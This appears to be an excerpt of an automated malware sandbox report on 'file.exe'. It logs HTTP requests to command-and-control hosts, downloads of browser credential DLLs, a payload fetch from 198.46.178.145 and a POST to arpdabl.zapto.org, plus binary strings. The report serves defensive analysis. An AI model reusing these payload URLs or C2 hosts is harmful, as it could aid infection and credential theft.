Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 2673Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60

Source: C:\Users\user\Desktop\file.exe

0_2_00405010

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache

Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org

Source: unknown

Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://127.0.0.1:8118
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exe
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exenderbird
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.FBGDHJKFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.KFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.orgJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zaptoJKFHJ
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txt7t
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtcc
Source: main.exe, 00000017.00000002.3441085501.000001E399027000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtvp/p_lib.c
